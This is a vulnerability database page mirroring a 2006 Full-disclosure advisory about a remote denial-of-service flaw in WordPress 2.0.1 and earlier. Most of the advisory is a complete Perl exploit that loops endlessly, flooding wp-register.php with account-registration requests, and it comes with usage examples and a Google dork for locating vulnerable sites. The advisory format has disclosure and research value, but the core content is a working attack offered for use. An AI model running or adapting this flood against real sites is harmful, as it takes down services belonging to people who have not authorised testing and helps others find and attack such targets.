Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11745
HistoryMar 08, 2006 - 12:00 a.m.

[Full-disclosure] HYSA-2006-005 WordPress 2.0.1 Remote DoS Exploit

2006-03-0800:00:00
vulners.com
12
JSON
  HYSA-2006-005 h4cky0u.org Advisory 014

Date - Wed March 08 2006

TITLE:

WordPress 2.0.1 Remote DoS Exploit

SEVERITY:

Medium

SOFTWARE:

Wordpress 2.0.1 and prior

INFO:

WordPress is a state-of-the-art semantic personal publishing platform with a focus on aesthetics, web standards, and
usability. What a mouthful. WordPress is both free and priceless at the same time.
Support Website : http://wordpress.org/

POC:

#!perl
#Greets to all omega-team members + h4cky0u[h4cky0u.org], lessMX6 and all dudes from #DevilDev ;)
#The exploit was tested on 10 machines but not all got flooded.Only 6/10 got crashed
use Socket;
if (@ARGV < 2) { &usage; }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg; #no http://
for ($i=0; $i<9999999999999999999999999999999999999999999999999999999999999999999999; $i++) #0_o :)
{
$user="\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x66\x6f\x6f".$rand.$i; #you N33d t0 be l33t t0 s33 th!S !
$data = "action=register&user_login=$user&user_email=$user\@matrix.org&submit=Register+%C2%BB";
$len = length $data;
$foo = "POST ".$dir."wp-register.php HTTP/1.1\r\n".
"Accept: /\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "+";
}
#s33 if the server is down
print "\n\n";
system('ping $host');
sub usage {
print "\n\t(W)ordpress 2.0.1 (R)emote (D)oS (E)xploit (B)y matrix_killer\n";
print "\te-mail: matrix_k\@abv.bg\n";
print "\tusage: \n";
print "\t$0 <host> </dir/>\n";
print "\tex: $0 127.0.0.1 /wordpress/\n";
print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n";
exit();
};

FIX:

No fix available as of date.

GOOGLEDORK:

"Powered by WordPress"

CREDITS:

  • Exploit coded by matrix_killer of h4cky0u Security Forums
    Mail : matrix_k at abv dot bg
    Web : http://www.h4cky0u.org

  • Co Researcher -
    h4cky0u of h4cky0u Security Forums.
    Mail : h4cky0u at gmail dot com
    Web : http://www.h4cky0u.org

ORIGINAL ADVISORY:

http://www.h4cky0u.org/advisories/HYSA-2006-005-wordpress.txt

–
http://www.h4cky0u.org
(In)Security at its best…

JSON